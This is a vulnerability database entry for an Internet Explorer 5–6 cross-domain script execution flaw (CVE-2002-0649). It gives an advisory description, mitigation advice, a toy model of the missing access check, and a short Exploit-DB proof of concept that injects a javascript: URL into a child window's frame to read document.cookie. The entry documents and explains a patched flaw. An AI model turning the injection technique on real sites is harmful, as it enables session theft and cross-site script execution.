Vendor: Internet Explorer
By: SecurityFocus
CVSS: 7.5 HIGH
Cross-Domain Script Execution
CWE: 79
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 5.0
Affected Version To: Microsoft Internet Explorer 6.0
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

MSIE Cross-Domain Script Execution Vulnerability

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the latter is of another domain or Security Zone. It has been reported that such checks fail to occur against attempts to access the frames of child window documents. It is possible for a parent window to set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications, as the parent can cause script code to be executed within the context of the child domain by setting the URL to the 'javascript' protocol, followed by the desired code. Attackers may also execute script code within the 'My Computer' Zone. This may have more severe consequences.
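
The missing check can be modelled in a few lines; this is an added illustration, not code from the advisory or from Internet Explorer. The window records, the `parent` field and the site-a/site-b URLs are constructed, and the model compares domains only, not Security Zones.

```javascript
// Toy model of the window access check (added illustration, not IE code).
// Window records, field names and URLs below are constructed for the example.
const originOf = (url) => new URL(url).origin;
const isScriptUrl = (url) => /^\s*javascript:/i.test(url);

// Flawed rule, as the advisory describes it: the child window itself is
// compared with the caller, but a frame inside the child is never compared.
function flawedCheck(callerUrl, target) {
  if (target.parent) return true; // frame of a child window: check skipped
  return originOf(callerUrl) === originOf(target.url);
}

// Corrected rule: every target, window or nested frame, is compared on the
// origin of the document it currently holds.
function strictCheck(callerUrl, target) {
  return originOf(callerUrl) === originOf(target.url);
}

// Apply a location change under a given rule and report the outcome.
// A javascript: URL loads nothing; its code runs as the target's document.
function setLocation(check, callerUrl, target, newUrl) {
  if (!check(callerUrl, target)) return { allowed: false, scriptRunsAs: null };
  if (isScriptUrl(newUrl)) {
    return { allowed: true, scriptRunsAs: originOf(target.url) };
  }
  target.url = newUrl;
  return { allowed: true, scriptRunsAs: null };
}

// Constructed scenario: a page on site-a opens a window on site-b whose
// document contains one frame, also served from site-b.
function scenario(check) {
  const caller = "http://site-a.example/opener.html";
  const child = { url: "http://site-b.example/", parent: null, frames: [] };
  const frame = { url: "http://site-b.example/inner.html", parent: child };
  child.frames.push(frame);
  return {
    childWindow: setLocation(check, caller, child, "javascript:void 0"),
    childFrame: setLocation(check, caller, child.frames[0], "javascript:void 0"),
  };
}

console.log("flawed:", scenario(flawedCheck));
console.log("strict:", scenario(strictCheck));
```

Under the flawed rule the direct access to the child window is refused while the same request aimed at its frame is granted and would run as site-b; the strict rule refuses both.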

Mitigation:

Ensure that all web browsers are kept up-to-date with the latest security patches. It is also recommended that users restrict the privileges of their web browsers to the minimum required to perform their tasks.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5672/info

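<script language="jscript">
// Runs once the opener page has loaded.
onload=function () {
    // Open a child window on another domain.
    var oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVictim","width=100,height=100");
    // After 7 seconds, set the location of the child's first frame.
    setTimeout(
        function () {
            oVictim.frames[0].location.href="javascript:alert(document.cookie)";
        },
        7000
    );
}
</script>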